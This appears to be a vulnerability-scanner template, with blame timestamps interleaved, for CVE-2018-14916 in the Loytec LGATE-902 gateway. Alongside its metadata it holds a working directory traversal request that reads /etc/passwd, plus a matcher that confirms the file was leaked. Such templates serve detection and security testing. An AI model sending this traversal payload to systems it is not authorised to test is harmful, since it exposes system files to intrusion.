2021-11-16 09:11:29 +00:00
id : CVE-2018-14916
2022-04-22 10:38:41 +00:00
2021-11-16 09:11:29 +00:00
info :
2021-11-16 09:19:02 +00:00
name : Loytec LGATE-902 Directory Traversal
2021-11-16 09:11:29 +00:00
author : 0x_Akoko
severity : critical
description : Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities.
reference :
- https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
2021-11-16 09:37:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-14916
2021-11-16 09:11:29 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score : 9.4
cve-id : CVE-2018-14916
cwe-id : CWE-732
tags : cve,cve2018,loytec,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200